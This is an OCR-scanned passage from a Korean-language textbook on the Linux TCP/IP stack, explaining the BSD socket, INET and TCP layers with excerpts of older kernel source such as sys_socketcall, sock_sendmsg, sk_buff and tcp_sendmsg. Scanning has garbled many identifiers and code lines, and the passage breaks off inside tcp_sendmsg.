TCP/IP 전송층에서 사용하는 sock 자료구조，장치층의 device 자료구조 그리고 실제 전송 
되는 자료와 매층의 머 리부구조가 기록되는 sk_bu 伴자료구조등이 중요한 자료구조이 다 . 


사 • 용 ？: ᅡ프로베스 


사용 차방식 
-' ᅳ소케트제계호술 ( 소케트서 mm — 
핵심부방식 


BSD 소케트쁨 


INET 소케트 ■ 



그림 3-1. LINUX 에서 TCP/IP 규약 실현을 위한 망구조 


계층구조와 자료구조 

VFS# struct file_operations /* include/Linux/fs. h */ 

BSD#- struct net_proto_family /* imclude/Linux/net. h */ 

INET 층 struct sock / ^include/net/sock, h */ 


proto_ops /* include/Linux/net. h */ 

전송층 struct tcp_opt sock / ^include/net/sock.h */ 

struct packet_type /* include/Linux/netdevic. h */ 
IP 층 struct tcp_func / ^include/Linux/tcp. h */ 

Device#- struct device / ^include/net/netdevice. h */ 
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3.1.2. 층별기능 및 자료구조해석 
1) 파케트송신과정 

응용프로그람에서 자료를 송신하는 립장에서 전반적인 자료 흐름과정에 대해 고찰하자 . 
— BSD 소케트층 

BSD 소케트층은 사용자와 체 계의 대면을 지 원하기 위하여 존재한다 . 사용자프로그람 
은 소케 트서 고를 동하여 체 계 호줄을 하게 되 며 이 렇 게 발생 된 체 계 호줄은 BSD 소케 트증 
으로 조종이 넘겨진다 . LINUX 에서는 다음과 같이 망에 대한 체계호출을 정의하고있다 . 


표 3-1. 소케트에 대한 체계호출 


체 계 호줄 

설 명 

int socket(int addr_family, int type, int 
protocol) 

소케 트를 생 성한다 . 

int bind (int s, struct sockaddr ^address, 
int address len) 

이름을 소케트에 묶는다 (bind). 

int listen (int s, int backlog) 

소케트에 대해서 련결을 기다린다 . 

int connect (int s, struct sockaddr 
^address, int address len) 

소케 트에 대 해서 련결을 요청한다 . 

int accept (int s, struct sockaddr ^address, 
int *address len) 

소케트에 대한 련결을 받아들인다 . 

int send (int s, char *msg, int len, int 
flags) 

소케트에 대해서 자료를 보낸다 . 

int sendto(int s, char *msg, int len, int 
flags, struct sockaddr *to, int tolen) 

소케트에 대해서 자료를 보낸다 . 단지 하 
나의 통보를 보내 려고 할 때 사용한다 . 

int getsockopt (int s, int level, int oname, 
char *ovalue, int *olen) 

소케 트의 현재 옵션을 얻는다 . 

int setsockopt(int s, int level, int oname, 
char *ovalue, int *olen) 

소케 트의 현재 옵션을 설 정한다 . 

int recv(int s, char *buf, int len, int 
flags) 

소케트에 대해서 자료를 받는다 

int recvfrom(int s, char *buf, int len, int 
flags, struct sockaddr *from, int 
*fromlen) 

소케트에 대해서 자료를 받는다 . 단지 하 
나의 통보만을 받으러고 할 때 사용한다 . 


우에서 정의 한 연산 이외에도 sendmsgO , recvmsgO , shutdownO 이 더 있는데 기 
본적 으로 우에서 정의한 연산의 내용과 크게 다르지 않다 . shutdown 의 경우에는 생성된 
소케푿름 없애주는 역할을 한다 . 우와 같은 함수는 직접적으로 프로쎄스에서 사용할수 있 


錢變邊 鍾變變©繼繼 


















게 3 광. LINUX 에째 땅보冬到 나련요소 


는 함수로서 정의되여 있지만 체계 호출로 들어 가면 단지 socketcallO 만이 정의되여 있다 . 나 
머 지 는 넘 겨 주는 파라메 터 값에 따라 각각 호줄된 다 . 

아래의 socketcallO 함수를 보여준다 . 코드는 ~ /net/socket.c 를 참조하였다 . 


코드 5. sys_socketcall 함수 

asmlinkage long sys_socketcall(int call, unsigned long *args) 


unsigned long a[6 ]； 
unsigned long aO,al ； 
int err ； 

if(call<l | | call>SYS_RECVMSG) 
return -EINVAL ； 

/* copy_from_user should be SMP safe. */ 
if (copy_from_user(a, args ， nargstcall])) 
return -EFAULT ； 

8.0—3. [O]; 
al=a[l]; 

switch(call) 


case SYS_socket: 

err = sy s_socket (aO, a 1, a [2]) ； 
break ； 

case SYS_BIND ： 

err = sys_bind(aO,(struct sockaddr *)al, a[2]); 
break ； 

case SYS_CONNECT ： 

err = sys_connect(aO, (struct sockaddr *)al, a[2 ])； 
break ； 

case SYS_LISTEN ： 

err = sys_listen(aO,al); 
brOeak ； 

case SYS_ACCEPT ： 

err = sys_accept(aO,(struct sockaddr *)al, (int *)a[ 到); 
break ； 

case SYS_GETSOCKNAME ： 

err = sys_getsockname(aO,(struct sockaddr *)al, (int *)a[2]); 
break ； 

case SYS_GETPEERNAME ： 

err = sys_getpeername(aO ? (struct sockaddr *)al, (int *)a[2]); 
break ； 
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case SYS_socketPAIR - 

err = sys_socketpair(aO,al ? a [ 到 , (int *)a[3]); 
break ； 

case SYS.SEND ： 

err = sys_send(aO, (void *)al ， a[2], a[3]); 
break ； 

case SYS_SENDTO ： 

err = sys_sendto(aO,(void *)al ， a [ 到 , a[3], 

(struct sockaddr *)a[4], a[5]); 
break ； 

case SYS_RECV ： 

err = sys_recv(aO, (void *)al, a[2], a[3]); 
break ； 

case SYS_RECVFROM ： 

err = sys_recvfrom(aO, (void *)al ， a [ 到 , a[3], (struct sockaddr *)a[4], (int *)a[5]); 
break ； 

case SYS_SHUTDOWN ： 
err = sys_shutdown(aO,al); 
break ； 

case SYS_SETSOCKOPT ： 

err = sys_setsockopt(aO, al, a [ 到 ， (char *)a[3] ， a[4]); 
break ； 

case SYS_GETSOCKOPT ： 

err = sys_getsockopt(aO, al, a [ 到 , (char *)a[3]，(int *)a[4]); 
break ； 

case SYS.SENDMSG ： 

err = sys_sendmsg(aO, (struct msghdr *) al, a[2 ])； 
break ； 

case SYS_RECVMSG ： 

err = sys_recvmsg(aO, (struct msghdr *) al, a[2]); 
break ； 
default: 

err = -EINVAL ； 
break ； 


return err ； 


또한 LINUX 에서는 소케트에 파일에 대한 연산을 직접 적용할수 있도륵 write, read 
등의 파일에 대한 연산기능을 가지고있다 . 이와 같은 연산을 하기 위해서는 소케트가 이 
미 생성되 여 있어 야 하며 련결이 되여있어 야 한다 . 

_UX 에서는 파일 에 대 한 연산을 그대 로 망통신에 대 한 연산으로 적 용할수 있도륵 하 
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고있다 . 례를 들어서 파일에 대한 write 연산을 소케트에 대한 write 연산과 동일하게 정의 
하고있다 . 즉 아래 와 같은 형 식의 write 체 계 호출을 정의 한다 . write 체 계 호출은 sys_write() 
이 며 시 fs/read_write. c 에 서 볼수 있 다 . 


코드 6. sys_write() 

asmlinkage ssize_t sys_write(unsigned int fd，const char * buf, size_t count) 

{ ᄂ 
ssize_t ret ； 
struct file * file ； 
ret = -EBADF ； 
file = fget(fd )； 

if (file) { 

if (file->f_mode & FMODE_WRITE) { 

struct inode *inode = file - >f_dentry->d_inode ； 

ret = locks_verify_area(FLOCK_VERIFY_WRITE ? inode, file, file->f_pos, count )； 
if (!ret) 

{ 

ssize_t (*write)(struct file *，const char * ， size_t ， loff_t *); 
ret = -EINVAL ； 

if (file->f_op && (write = file - >f_op->write) != NULL) 
ret = write (file, buf, count, &file - >f_pos )； 

} 


if (ret > 0) 

inode_dir_notify(file - >f_dentry->d_parent->d_inode, DN_MODIFY); 
fput(file )； 


return ret ； 


sys_write() 체 계 호출은 VFS(Virtual File System) 의 일부로서 파일서 술자의 index 
를 받아서 해 당한 파일 객 체 에 대 한 지 적 자를 얻 고 이 것 을 다시 리 용하여 해 당한 inode 구 
조체 를 얻는다 . 그리 고 해 당한 파일객 체 의 파일 연산자 write 를 실 행 하는 구조로 되 여 있 다 . 
즉 파일객체를 소케트에 대해서도 정의해주고 이에 대한 서술자만 가지고있다면 프로쎄스 
가 소케트에 대한 write 연산도 일반파일에 대 한 write 연산과 같은 방식으로 할수 있다는 
것 을 의 미 한다 . 

여 기 서 의 파일 연산자의 write() 에 해 당하는것 이 바로 BSD 의 sock_write() 이 다 . 


鍾變邊 錢變變©繼繼 







Lirnix 당보안 


코드 7. sock_write () 

static ssize_t sock_write(struct file *file，const char *ubuf, size_t size, loff_t *ppos) 

{ 

struct socket *sock ； 
struct msghdr msg ； 
struct iovec iov ； 

if (ppos != &file - >f_pos) 
return -ESPIPE ； 

if(size==0) /* Match SYS5 behaviour */ 
return 0 ； 

sock = socki_lookup(file - >f_dentry->d_inode )； 

msg. msg_name=NULL ； 

msg.msg_namelen=0; 

msg.msg_iov=&iov; 

msg. msg_iovlen= 1 ； 

msg.msg_control=NULL ； 

msg. msg_controllen=0; 

msg.msg_flags=!(file ->f_flags & O.NONBLOCK) ? 0 ： MSG.DONTWAIT ； 

if (sock-〉type == SOCK_SEQPACKET) 
msg.msg_flags | = MSG_EOR ； 
iov.iov_ _base=(void *)ubuf; 
iov.iov_len=size ； 

return sock_sendmsg(sock ? &msg, size )； 


먼저 해당한 파일객체에서 위치 (position) 를 확인한후 옳바른 길이를 가지는 자료의 전 
송인지를 확인한다 . 해당한 inode 에서 소케트구조체를 찾은후 통보구조체와 iovec 구조체 
를 넘 겨 받은 파라메 터 값으로 초기 화한다 . 이 와 같은 과정 을 끝내 면 sock_sendmsg() 함수 
를 호출한다 . 

BSD 소케트증에서 사용하는 몇가지 자료구조를 고찰하자 . 

우선 제 일 중요한 자료구조가 socket 구조체 이다 . 
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코드 8. socket 구조체 
struct socket 
{ 

socket_state state ； / * 소케트의 상태 */ 

unsigned long flags ； / * 소케트가 가진 기발값 */ 
struct proto_ops *ops; / * 소케트와 관련된 통신규약의 연산자 */ 
struct inode *inode ； / * 소케트와 관련된 inode */ 
struct fasync_struct *fasync_list ； /* 비 동기 적 인 wake up 목록 */ 
struct file *file ； /* 소케트와 관련된 파일객체에 대한 지적자 */ 
struct sock *sk; /* sock 구조체 */ 
wait_queue_head_t wait ； / * 소케트에 대 한 대기렬 */ 
short type ； / * 소케트의 류형 */ 
unsigned char passcred ； /* 통과암호인증 */ 


소케 트의 상태 에 는 아래 와 같은 값들이 있다 . 


typedef enum 

{ 

SS_FREE = 0， /* 소케트가 현재 사용되지 않고 있다 .*/ 
SSJJNCONNECTED，/* 소케트가 련결되지 않은 상태이다 .*/ 
SS_CONNECTING, /* 소케트에 대한 련결이 진행중이다 .*/ 
SS_CONNECTED, /* 소케트가 련결상태에 있다 .*/ 
SS_DISCONNECTING /* 소케트에 대해서 련결을 끊고있는 중이다 .*/ 

} 

socket_state ； 


또한 소케트의 류형에는 다음과 같은것들이 있다 . 


#define SOCK_STREAM 1 /* 련결 지 향형 (Stream) 소케 트 */ 

#define SOCK_DGRAM 2 /* 비 련결 지 향형 (Datagram) 소케 트 */ 

#define SOCK—RAW 3 /* Raw 소케 트 */ 

# define SOCK_RDM 4 /* Reliably-Delivered Message 소케트 */ 

#define SOCK_SEQPACKET 5 /* 련속적 인 (sequential) 파케 트 소케 트 */ 

#define SOCK_PACKET 10 /* 장치준위 에서 파케트를 수신 및 송신할수 있는 소케트 */ 


소케트의 류형에 대해서 SOCK_STREAM 은 TCP 에 그리고， SOCK_DGRAM 은 UDP 
에 해 당한다 . 또한 SOCK_RAW 는 IP 파케 트를 주고받기 위해서 사용한다 . 

sys_write() 체계 호출에서 보았던 통보 (message ) 구조체에 대해서 고찰해 . 
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이 구조체 는 sock_sendmsg() 함수에 대 한 파라메터 로 넘 겨 지 는 자료구조로서 아래 와 
같이 정의된다 . 〜 /include/Linux/socket.h 를 참고하였다 . 


코드 9. 머리부의 정의 
struct msghdr 
{ 

void * msg_name ； /* 소케트의 이름 */ 
int msg_namelen ； /* 소케트 이름의 길이 */ 

struct iovec * msg_iov ； /* 전달할 자료블로크를 가리 키 는 지적 자 */ 

_ kernel_size_t msg_iovlen ； /* 블로크의 수 */ 

void * msg_control ； /* Per protocol magic (eg BSD file descriptor passing) */ 
— kernel_size_t msg_controllen : /* cmsg 목록의 길이 */ 
unsigned msg_flags; / * 통보의 기발 값 */ 


통보에 넣을 자료는 iovec 구조체로 표현된다 . 정의는 아래와 같다 . 
~/include/Linux/uio.h 를 참조하였다 . 


코드 10.iovec 구조체의 정의 
struct iovec 
{ 

void *iov_base; /* BSD uses caddr_t (1003. lg requires void *) */ 
一 kernel_size_t iov_len ； /* Must be size_t (1003. lg) */ 

}； 


결과적으로 sock_write() 함수는 sock_sendmsg() 함수를 호줄하게 되며 
sock_sendmsg () 함수는 아래와 같이 정의된다 . 


코드 11. sock_sendmsg() 함수의 정의 

int sock_sendmsg (struct socket *sock, struct msghdr *msg, int size) 

{ 

int err ； 

struct scm_cookie scm ； 

err = scm_send(sock, msg, &scm) ； 

if (err 〉= 0) 

{ 

err = sock->ops->sendmsg(sock, msg, size, &scm) ； 
scm_destroy (&scm) ； 

} 

return err ； 
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scm_send() 함수는 소케트준위에서 조종 (control) 통보에 대한 처리를 담당하며 오유 
가 없 을 경 우에 는 0 이 상의 값을 돌려주게 되 며 결 국 소케 트의 연산자인 sendmsgO 함수 
를 호출하여 전송을 시작한다 . 만약 처 리도중에 오유가 있다면 0 보다 작은 값을 돌려준 

다 . 

소케 트에 대 한 연산자 ops 에 는 통신규약 (protoml) 연산자가 들어 가게 되 며 proto_ops 
구조체 로 정 의되 는데 그것 을 코드 12 에서 보여주었 다 . 이것은 ~/include/net.h 에서 참조 
하였다 . 


코드 12. proto_ops 구조체의 정의 
struct proto_ops 


int family ； 

int (^release) (struct socket *sock )； 

int (*bind) (struct socket *sock，struct sockaddr *umyaddr, int sockaddr_len )； 
int (^connect) (struct socket *sock, struct sockaddr ^uservaddr, 
int sockaddr_len, int flags); 

int (^socketpair) (struct socket *sockl, struct socket *sock2); 
int (^accept) (struct socket *sock, struct socket *newsock, int flags); 
int (^getname) (struct socket *sock, struct sockaddr *uaddr, 
int *usockaddr_len, int peer )； 

unsigned int (*poll) (struct file *file, struct socket *sock, struct poll_table_struct 
*wait); 

int (*ioctl) (struct socket *sock, unsigned int cmd, unsigned long arg); 
int (^listen) (struct socket *sock, int len )； 
int (^shutdown) (struct socket *sock, int flags )； 
int (*setsockopt) (struct socket *sock, int level, int optname, 
char *optval, int optlen )； 

int (*getsockopt) (struct socket *sock, int level, int optname, 
char *optval, int ^optlen )； 

int (^sendmsg) (struct socket *sock, struct msghdr int total_len, 
struct scm_cookie *scm); 

/* scm 에 대 한 정 의 는 〜 /include/net/scm.h 와 ~/net/core/scm.c 를 참고하였 다 . */ 
int (*recvmsg) (struct socket *sock, struct msghdr *m, int total_len, int flags, 
struct scm_cookie *scm); 

int (*mmap) (struct file *file, struct socket *sock, struct vm_area_struct * vma )； 


보는것 처 럼 proto_ops 구조체 는 사용하게 될 봉사를 정 의 해놓은것 이 다 . 

— INET 소케트층 

INET 소케 트층은 IP 에 기 초하여 TCP 나 UDP 규약의 통신을 관리하는 역 할을 한다 . 
먼저 INET 소케 트층에서 정 의 하는 proto_ops 구조체 를 보도록 하자 . 
proto_ops 구조체 는 〜 l net/ipv4 / af_inet. c 에 정 의 되 여 있 다 . 
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코드 13. INET proto_ops 의 정의 

struct proto_ops inet_stream_ops = { 
family ： PF_INET, 
release ： inet_release, 
bind: inet_bind, 
connect : inet_stream_connect, 
socketpair : sock_no_socketpair, 
accept : inet_accept, 
getname : inet_getname, 
poll: tcp_poll, 
ioctl: inet_ioctl, 
listen : inet_listen, 
shutdown : inet_shutdown, 
setsockopt : inet_setsockopt, 
getsockopt : inet_getsockopt, 
sendmsg ： inet_sendmsg, 
recvmsg ： inet_recvmsg, 
mmap : sock_no_mmap 

}； 

struct proto_ops inet_dgram_ops = { 
family ： PF_INET, 
release : inet_release, 
bind: inet_bind, 
connect : inet_dgram_connect, 
socketpair : sock_no_socketpair, 
accept : sock_no_accept, 
getname : inet_getname, 
poll : datagram_poll, 
ioctl: inet_ioctl, 
listen : sock_no_listen, 
shutdown : inet_shutdown, 
setsockopt : inet_setsockopt, 
getsockopt : inet_getsockopt, 
sendmsg: inet_sendmsg, 
recvmsg : inet_recvmsg, 
mmap : sock_no_mmap, 


TCP 와 UDP 에 대 해 INET 소케 트층과의 대면부를 정의해놓고있다 . 이 렇게 정의된 대 
면부는 BSD 소케트층에서 해당하는 연산에 대해 매개의 소케트류형에 맞게 호출된다 . 례를 들 
어 sys_write() 에서 TCP 를 사용할 경우 sock_sendmsg() 함수는 sock- 〉 ops- 〉 sendmsg() 함수에서 
inet_sendmsg() 함수를 호출한다 . 

i^t_sendmsg() 함수를 보도록 하자 . 코드 14 는 ~/net/ipv4/af_inet.c 에서 참조하였다 . 
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코드 14. inet_sendmsg 함수 

int inet_sendmsg(struct socket *sock，struct msghdr *msg，int size, 
struct scm_cookie *scm) 

{ 

struct sock *sk = sock_ 〉 sk; 

/* We may need to bind the socket. */ 
if (sk- 〉 num==0 && inet_autobind (sk) != 0) 
return -EAGAIN; 

return sk->prot->sendmsg (sk, 、 msg ， size) ； 


소케트가 이미 생성되 여 있으므로 socket 구조체의 sk 마당을 참조하면 관련된 규약의 해 
당하는 sendmsgO 함수를 호출할수 있다 . 따라서 inet_sendmsg() 함수는 해 당하는 통신규 
약의 sendmsgO 함수를 호출하면 된다 . 

그러면 INET 소케트층에서 사용하는 sock 구조체에 대해서 보기로 하 

자 . 〜 /include/net/sock, h 에 정 의 되 여 있 다 . 


표 3-2. sock 구조체의 마당들 


마 당 

설 명 

— u32 daddr 

목적 지 의 IP 주소 (4byte ： XXX. XXX. XXX. XXX) 

— u32 rcv_saddr 

bind 된 지 역 (자신의 ) IP 주소 
(4byte : XXX. XXX. XXX. XXX) 

— ul6 dport 

목적지의 포구번호 

unsigned short num 

지역포구번호 

int bound dev if 

0 이 아닌 경 우에 device 에 대 한 index 로 사용 

struct sock *next, 

**pprev, *bind next, bind pprev 

다양한 규약에 대 한 sock 구조체 의 하쉬표를 유지 

volatile unsigned char state 

련결 상태 

volatile unsigned char zapped 

AX25 와 IPX 에서 련결되지 않은것을 나타냄 

— ul6 sport 

발신지의 포구번호 

unsigned short family 

주소계렬 ( 례 를 들어 서 AF_INET ： Internet 
address family) 

unsigned char reuse 

SO REUSEADDR 의 설정에 필요함 

unsigned char shutdown 

소케트의 련결이 끊어짐 

atomic t refcnt 

참조계수값(현재 sock 을 사용하는 계수값 ) 

socket lock t lock 

sock 에 대 한 lock 

int rcvbuf 

수신완충기의 크기 (byte 단위 ) 
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마 당 

설 명 

wait queue head t *sleep 

sock 의 대기렬 

struct dst entry *dst cache 

목적지고속완충기 

rwlock t dst lock 

목적지에 대한 읽기，쓰기 lock 

atomic t rmem alloc 

현재 소케트가 요청한 기 억기읽기량을 표시 

struct sk bu 伴 - head receive queue 

들어오는 파케트에 대한 대기렬 

atomic t wmem alloc 

현재 소케 트가 요청한 기 억 기 쓰기량을 표시 

struct sk bu 伴 - head receive queue 

들어오는 파케트에 대한 대기렬 

struct sk bu 伴 - head write queue 

나가는 ( 전달되는 ) 파케트에 대한 대기렬 

atomic t omem alloc 

옵션을 위해서 현재 소케트가 요청한 기 억 기 량 

int wmem queued 

불변쓰기대기렬의 크기 

int forward alloc 

할당된 공간의 크기 

— u32 saddr 

보내는 원천주소 

unsigned int allocation 

할당방식 

int sndbuf 

전송완충기 크기 (byte) 

struct sock *prev Hash 

련결목록의 앞에 있는 sock 구조체에 대한 지적자 

volatile char dead, done, urginline, 
keepopen, linger, destroy, 
no check, broadcast, bsdism 

소케트에 대해서 설정되는 변수들 

unsigned char debug 

Debugging 

unsigned char rcvtstamp 

Receive time stamp 

unsigned char userlocks 

소케 트사용자 금지 설 정 

int proc Out of band 

자료를 받았을 때 신호를 전송받을 프로쎄스나 프 
로쎄스의 그롭 

unsigned long lingertime 

Linger option 을 사용할 경우 기 다리는 시 간 

int hashent 

하쉬 표요소값 

struct sock *pair 

accept () 함수에 서 새 로운 sock 구조체 를 만들 때 생 
기는 새 sock 구조체에 대한 지적자 

struct { 

struct sk_bu 伴 *head ； 
struct sk_bu 伴 *tail ； 

} backlog 

Backlog 대 기 렬 . sk_bu 伴구조체 의 련 결 목록 

rwlock t callback lock 

Call back 함수를 위한 읽 기 /쓰기 lock 

struct sk bu 伴 - head error queue 

오유 sk bu 伴구조체 의 대 기 렬 

struct proto *prot 

소케 트와 관련된 통신규약의 연산을 가리키 는 
지적자 

^#i^^£ined() 

규약의 정보 및 옵션들을 가지는 마당들 


136 
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마 당 

설 명 

net_pinfo ， tp_pinfo 
#endi 


int err, err_soft 

오유가 발생했음을 알림 . C 에서 errno 와 같은 역 
할을 함 

unsigned short 

ack backlog，max ack backlog 

Acknowlege 된 backlog 과 그것 의 최대값 

— u32 priority 

소케트의 우선순위 

unsigned short type 

BSD 소케트구조체로부터 넘겨 받은 소케트의 류형 

unsigned char localroute 

파케트가 지역적으로만 경로조종 되여야함 

int rcvlowat 

Receive low wait ?]： 

long rcvtimeo 

Receive timeout 

long sndtimeo 

Send timeout 

■ef CONFIG.FILTER 
struct filter ^filter ； 

#endif 

소케 트려과를 위한 구조체 (어 떤 파케 트들을 려 과 
하거나 어떤 처리를 해줄것인지를 정함 ) 

union {} protinfo 

각각의 주소계렬에 필요한 정보를 저장 

struct timer list timer 

소케 트의 clean up timei ■들에 대 한 목록 

struct socket ^socket 

sock 구조체 와 관련된 BSD 소케 트구조체 에 대 한 지 
적 자 . 이 것을 리용해서 10 신호를 보낸다 

void *user data 

RPC layer 를 위 한 자료의 지 적 자 

void (*state change) (struct sock *sk) 

소케트의 상태변화시 에 호출되는 함수에 대 한 지적 자 

void (*data_ready) (struct sock 
*sk，int bytes) 

자료를 받았을 경우에 호출되는 함수에 대한 지 
적자 

void (*write_space) (struct sock 
*sk) 

Write 연산을 위해서 사용할수 있는 기 억 기 가 있 
을 때 호줄되는 함수에 대한 지적자 

void (*err report) (struct sock *sk) 

오유가 발생했을 때 호출되는 함수에 대한 지적자 

int (*backlog_rcv) (struct sock 
*sk, struct sk bu 伴 *skb) 

Backlog 에 대 한 receive 연산에 호출되 는 함수에 대 
한 지적자 

void (*destruct) (struct sock *sk) 

sock 구조체 를 없 애 기 (destruction) 위 해 서 호출되 
는 함수에 대한지적자 


sock 구조체에 sk_bu 伴 구조체마당이 있는데 이것은 나중에 망장치구동기를 언급할 때 
다시 론의하자 . sk_bu 伴구조체 는 소케 트련결 에 서 사용하는 구조체 로 사용자의 자료와 각 
종 규약의 정 보를 담는데 쓰인다 . 핵 심부내 에서 기 억기사이의 복사 (copy ) 회 수를 줄이며 매 
개 통신규약에서 자신만의 정 보를 나타내 는데서 효률적 이 다 . 소케 트완충기 (socket buffer) 
구조체인 sk_bu 伴구조체는 아래 와 같이 정의된다 . 
include/Linux/skbuff. h 를 참조하였 다 . 
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표 3-3. 

sk_buff 구조체 

마당 

설명 

struct sk bu 伴 *next, *prev 

sk bu 伴 목록의 다음과 이전을 가리 키는 지적 자 

struct sk bu 伴 - head *list 

현재 sk bu 伴가 속한 sk bu 伴 head 에 대한 지적자 

struct sock *sk 

현재 sk bu 伴를 사용하는 INET sock 에 대한 지적자 

struct timeval stamp 

sk bu 伴가 도착한 시간 

struct net_device *dev 

받거 나 보내는 망장치의 구조체 에 대한 
지적자 (Network device driver 를 참고 ) 

union {} h 

전송층 (INET 아래 에 있는 층 ) 의 머 리 부정보 

union {} mac 

Mac 층 ！* (Medium Access Control: 련결층 망층 

아래 에 있는 층)의 머 리 부정보 

struct dst entry 

목적지주소에 대한 지적자 

char cb[48] 

Control buffer ( 모든 층에서 사용가능하다 .) 

unsigned int len 

실제자료의 길이 

unsigned int csum 

검사합 

volatile char used 

자료가 사용자에게 넘 어갔음을 나타냄 

unsigned char cloned 

Sk bu 伴 - head 가 clone (복제 ) 되 였 음을 나타냄 

unsigned char pkt type 

파케트의 류형 

unsigned char ip summed 

IP 검사합으로 구동프로그람이 제공함 

— u32 priority 

파케트의 대기렬우선순위 

atomic t users 

파케트의 사용자계수값 

unsigned short protocol 

장치로부터 받은 파케트의 통신규약 

unsigned short security 

파케트의 보안준위 

unsigned int truesize 

완충기의 실제크기 

unsigned char *head 

자료완충기의 머 리부를 가리키는 지적 자 

unsigned char *data 

자료완충기의 자료부분을 가리키는 지적 자 

unsigned char *tail 

자료완충기의 자료마지막부분을 가리키는 지적자 

unsigned char *end 

자료완충기의 마지막을 가리키는 지적 자 

void (^destructor) (struct 
sk bu 伴 ) 

Sk buff 구조체 를 없 애 는 함수에 대 한 지 적 자 


나머 지 핵 심 부의 구성 (configuration) 에 따른 변수들 


이 상에서 설명 한 BSD 소케 트의 구조체 와 INET 소케 트， sk_bu 伴 구조체 를 종합하여 보 
면 아래의 그림과 같다 . 
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그림 3-2. BSD 소케트 및 INET 소케트구조체， sk _ buff 2| 호상관계 

그림 3-2 는 하나의 BSD 소케트에 하나의 INET sock 구조체를，그리고 ， INET sock 
구조체 에 대 해 서 들어 오거 나 나갈 파케 트를 가리 키 는 sk_buff 구조체 를 련 관시 켜 보여 주고 
있다 . 받거나 보낼 파케트들은 전부 soc k 구조체에 련결되여 처리를 기다리게 된다 . 

여 기서 sk_bu 伴 _ head 구조체는 sk_bu 伴들의 원형 (circular ) 대 기 렬을 관리 하기 위 해서 
쓰이며 아래와 같이 정의된다 . 


코드 15. sk_buff_head 구조체의 정의 
struct sk_bu 伴 - head 
{ 

/* These two members must be first. */ 
struct sk_bu 伴 * next ； 
struct sk_bu 伴 * prev ； 

— u32 qlen ； 
spinlock_t lock ； 


sk_bu 伴를 가리 키는 next 와 prev 마당，현재 대 기 렬에 저 장된 sk_bu 伴의 크기ᅭ를 보여 
주는 qlen 그리 고 sk_bu 伴 _head 에 대 한 동기 화 (synchronization) 접 근을 위 한 sf 


祭 
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의 lock 로 구성된다 . 

앞에서 언급한 sk->prot->sendmsg() 함수를 보자 . 만일 아래의 통신규약이 TCP 라 
고 한다면 TCP 규약의 연산인 sendmsgO 함수가 호출될것이다 . TCP 규약에서 제공하는 연 
산자들은 코드 16 과 같다 . 이것은 〜 /include/net/tcp_ipv4.c 에 정의되여있다 . 


코드 16. TCP 규약에서 제공하는 함수의 정의 
struct proto tcp_prot = { 
name ： ’’TCP ’’， 
close: tcp_close, 
connect : tcp_v4_connect, 
disconnect : tcp_disconnect, 
accept : tcp_accept, 
ioctl: tcp_ioctl, 
init: tcp_v4_init_sock, 
destroy : tcp_v4_destroy_sock, 
shutdown: tcp_shutdown, 
setsockopt : tcp_setsockopt, 
getsockopt : tcp_getsockopt, 
sendmsg: tcp_sendmsg, 
recvmsg : tcp_recvmsg, 
backlog_rcv ： tcp_v4_do_rcv, 
hash ： tcp_v4_hash, 
unhash : tcp_unhash, 
get_port : tcp_v4_get_port, 


TCP 규약의 연산자인 tcp_sendmsg() 함수가 sendmsg 로 정의되여 있 으므로 TCP 규약 
의 tcp_sendmsg() 함수를 보자 . 이것은 ~/include/net/tcp. c 에 정의되여 있다 . 


— TCP 및 UDP 층 

TCP 및 UDP 층에서는 사용자로부터 전달받은 자료를 실제의 sk_buff 형태로 만들고 이 
것 을 아래 의 IP 층으로 전 달하는 역 할을 한다 . TCP 와 UDP 는 가장 널 리 알려진 인 터네 트 
통신규약이며 아래에서 보게 될 IP 층과 같이 TCP/IP 로 불리운다 . TCP 와 UDP 는 각각 사 
용하는 봉사의 질에서 차이가 있으며 이것은 련결성을 지향하는가 아니면 그렇지 않은가 
로 구분한다 . 

tcp_sendmsg() 함수를 보자 . 이 함수는 사용자로부터 넘겨 받은 자료를 sk_buff 형래로 
만드는것과 실제 전송을 시 작하는 역 할을 한다 . 
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코드 17. tcp_sendmsg() 

int tcp_sendmsg(struct sock *sk，struct msghdr *msg，int size){ 
struct iovec *iov; 
struct tcp_opt *tp ； 
struct sk_bu 伴 *skb ； 
int iovlen, flags ； 
int mss_now; 
int err, copied ； 
long timeo ； 

// ① 

err - 0 ； 

tp = &(sk- 〉 tp_pinfo.af_tcp); 
lock_sock(sk); 

TCP_CHECK_TIMER(sk )； 
flags - msg- 〉 msg_flags; 

timeo = sock_sndtimeo(sk ， flags&MSG_DONTWAIT )； 

// © 

/* Wait for a connection to finish. */ 

if ((1 « sk->state) & ~(TCPF_ESTABLISHED | TCPF_CLOSE_WAIT)) 
if((err = wait_for_tcp_connect(sk, flags, &timeo)) != 0) 
goto out_unlock ； 

// ③ 

I* This should be in poll */ 

clear_bit(SOCK_ASYNC_NOSPACE ? &sk->socket->flags )； 
mss_now = tcp_current_mss(s k); 

/* Ok commence sending. */ 
iovlen = msg->msg_iovlen ； 
iov = msg- 〉 msg_iov; 
copied = 0 ； 

// ④ 

while (--iovlen 〉= 0) { 
int seglen=iov>iov_len ； 

unsigned char * from=iov- 〉 iov_base; 
iov ++； 

while (seglen 〉 0) { 

int copy, tmp ， queue_it ； 
if (err) 

goto do_fault2 ； 

/* Stop on errors. */ 
if (sk->err) 

goto do_sock_err ； 

/* Make sure that we are established. */ 
if (sk->shutdown & SEND_SHUTDOWN) 
goto do_shutdown ； 

/* Now we need to check if we have a half 
* built packet we can tack some data onto. 

*/ 
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skb = sk->write_queue.prev ； 
if (tp->send_head && 

(mss_now - skb- 〉 len) 〉 0) { 
copy = skb->len ； 
if (skb_tailroom(skb) 〉 0) { 

int last_byte_was_odd = (copy % 4); 
copy = mss_now - copy ； 
if(copy > skb_tailroom(skb)) 
copy = skb_tailroom(skb); 
if(copy > seglen) 
copy = seglen ； 
if(last_byte_was_odd) { 

if(copy_from_user(skb_put(skb, copy), from, copy)) 
err = -EFAULT ； 

skb->csum = csum_partial(skb - 〉 data, skb->len, 0); 

} else { 

skb->csum = csum_and_copy_from_user( 

from, skb_put(skb, copy), copy, skb->csum, &err )； 

} 

tp->write_seq += copy; 

TCP_SKB_CB(skb)->end_seq += copy ； 
from += copy ； 
copied += copy; 
seglen -= copy ； 

if (PSH_NEEDED | | after(tp ->write_seq, tp ->pushed_seq+ 
(tp ->max_window»l))) { 

TCP_SKB_CB(skb)->flags | = TCPCB_FLAG_PSH ； 
tp->pushed_seq = tp ->write_seq ； 


if (flags&MSG_OOB) { 
tp->urg_mode = 1 ； 
tp->snd_up = tp ->write_seq ； 
TCP_SKB_CB(skb)->sacked | : 


